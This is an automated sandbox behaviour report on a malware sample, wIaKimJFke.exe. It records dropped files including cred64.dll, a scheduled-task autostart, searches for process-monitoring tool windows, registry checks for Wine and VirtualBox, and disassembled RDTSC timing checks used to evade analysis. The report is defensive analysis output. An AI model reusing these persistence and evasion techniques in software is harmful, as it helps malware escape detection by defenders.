Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wIaKimJFke.exe	File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Windows\Tasks\explorgu.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 54BAE0 second address: 54BAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C6104 second address: 6C613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED7550886Ch 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 jl 00007FED75508866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C524B second address: 6C525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C5383 second address: 6C539A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FED75508866h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57D6 second address: 6C57DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57DC second address: 6C57F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED75508871h 0x00000008 jmp 00007FED7550886Bh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57F2 second address: 6C580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FED74F3E516h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C580A second address: 6C581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508870h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C80BF second address: 6C8114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007FED74F3E523h 0x00000016 push 7316E533h 0x0000001b push esi 0x0000001c pushad 0x0000001d jmp 00007FED74F3E524h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8114 second address: 6C818A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 7316E5B3h 0x0000000d mov dx, cx 0x00000010 push 00000003h 0x00000012 call 00007FED7550886Bh 0x00000017 mov dword ptr [ebp+122D1C56h], ecx 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 xor ecx, 67827052h 0x00000026 pushad 0x00000027 cld 0x00000028 push eax 0x00000029 mov di, 5C8Fh 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FED75508868h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b add dword ptr [ebp+122D1D01h], edx 0x00000051 push 6552850Dh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FED7550886Eh 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8361 second address: 6C8387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 jns 00007FED74F3E516h 0x00000016 jng 00007FED74F3E516h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8387 second address: 6C838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C838B second address: 6C8391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8391 second address: 6C83D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FED7550886Eh 0x00000016 jng 00007FED75508868h 0x0000001c pop eax 0x0000001d mov si, 5717h 0x00000021 lea ebx, dword ptr [ebp+1244FF8Dh] 0x00000027 and cx, 05ECh 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FED7550886Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8446 second address: 6C8460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E521h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8460 second address: 6C8464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8464 second address: 6C84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FED74F3E51Ch 0x0000000f ja 00007FED74F3E516h 0x00000015 jmp 00007FED74F3E51Dh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jc 00007FED74F3E516h 0x00000027 jc 00007FED74F3E516h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jnp 00007FED74F3E516h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84A2 second address: 6C84B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FED75508866h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84B5 second address: 6C84B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84B9 second address: 6C84BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84BF second address: 6C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84C9 second address: 6C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84CD second address: 6C8517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jng 00007FED74F3E51Ah 0x00000012 pop eax 0x00000013 jbe 00007FED74F3E51Ch 0x00000019 mov ecx, dword ptr [ebp+122D3724h] 0x0000001f push 00000003h 0x00000021 xor dword ptr [ebp+122D17D4h], eax 0x00000027 push 00000000h 0x00000029 jno 00007FED74F3E51Bh 0x0000002f push 00000003h 0x00000031 sub dword ptr [ebp+122D1DC9h], edx 0x00000037 push 9A31F0A4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8517 second address: 6C851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
